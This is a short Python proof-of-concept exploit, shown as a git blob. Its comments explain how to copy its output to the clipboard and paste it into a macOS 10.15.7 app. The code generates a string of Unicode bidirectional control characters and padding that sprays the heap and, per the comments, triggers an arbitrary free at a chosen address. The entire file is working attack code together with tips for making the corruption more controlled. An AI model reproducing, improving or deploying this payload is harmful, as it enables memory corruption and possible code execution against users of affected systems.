blob: 581fbc9d5a92c1fef0011980e6d04fc0ec2fb16b (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
# python3 poc.py | pbcopy
# paste into app
# profit
#
# super stable PoC
# works about 10% of the time if you're lucky
#
# should free 0x1515151515151515
# it like sprays that in a similar location to the free list, and sometimes ends up freeing it
# for a more controlled free you might have to find each of the 256 values (i haven't yet), and substitute them
# example: 0x41 becomes 0x15, and 0xffff becomes 0x4
# so if you spray "\x41\x41\uffff\x41\uffff\uffff\uffff\uffff" it'll spray 0x1515041504040404, maybe something else because endianess but fuck you, whatever
# also there's like an offset of 0x2 or something
# i add "\uffff\uffff" at the start which seems to pad it for the address to work right
# it's vaguely functional, and should at least prove the bug exists
# note: this may have been patched in some big sur version (or 11.0 itself)
# run on 10.15.7, it's been tested there.
import sys
def lol(l2):
s = ""
a = ["\u202a", "\u202b", "\u202c", "\u202d", "\u202e", "\u202f"]
b = []
for i in a:
for j in a:
b += i + j
for i in range(l2):
s += b[i % (len(b))]
c = "\x41" * 0x8000
if i == 6:
s += c
else:
s += "\1"
return s
print(lol(18))
|
